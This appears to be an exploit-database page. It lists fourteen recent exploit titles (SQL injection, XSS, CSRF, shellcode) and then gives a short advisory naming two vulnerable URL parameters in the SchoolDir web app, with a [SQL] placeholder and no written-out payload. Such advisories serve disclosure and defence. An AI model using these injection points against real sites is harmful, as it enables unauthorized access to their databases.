
14 new exploits SysGauge 1.5.18 - Buffer Overflow WePresent WiPG-1500 - Backdoor Account Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes) DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting WordPress Plugin User Login Log 2.2.1 - Cross-Site Scripting WordPress Plugin Popup by Supsystic 1.7.6 - Cross-Site Request Forgery WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting WordPress Plugin Global Content Blocks 2.1.5 - Cross-Site Request Forgery WordPress Plugin File Manager 3.0.1 - Cross-Site Request Forgery SchoolDir - SQL Injection Rage Faces Script 1.3 - SQL Injection Meme Maker Script 2.1 - 'user' Parameter SQL Injection
20 lines
No EOL
762 B
Text
Executable file
20 lines
No EOL
762 B
Text
Executable file
# # # # #
|
|
# Exploit Title: SchoolDir - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 01.03.2017
|
|
# Vendor Homepage: http://www.brynamics.xyz/
|
|
# Software: https://codecanyon.net/item/schooldir/19326269
|
|
# Demo: http://www.brynamics.xyz/schooldir/
|
|
# Version: N/A
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/search?searchItem=[SQL]&criteria=schools
|
|
# http://localhost/[PATH]/sortsearch?School_type=[SQL]&fees=2&ownership=federal&location=Nigeria&searchItem=Harvard+University&criteria=schools
|
|
# If you don't know to use the vulnerabilities, you don't need to check it.
|
|
# Etc...
|
|
# # # # # |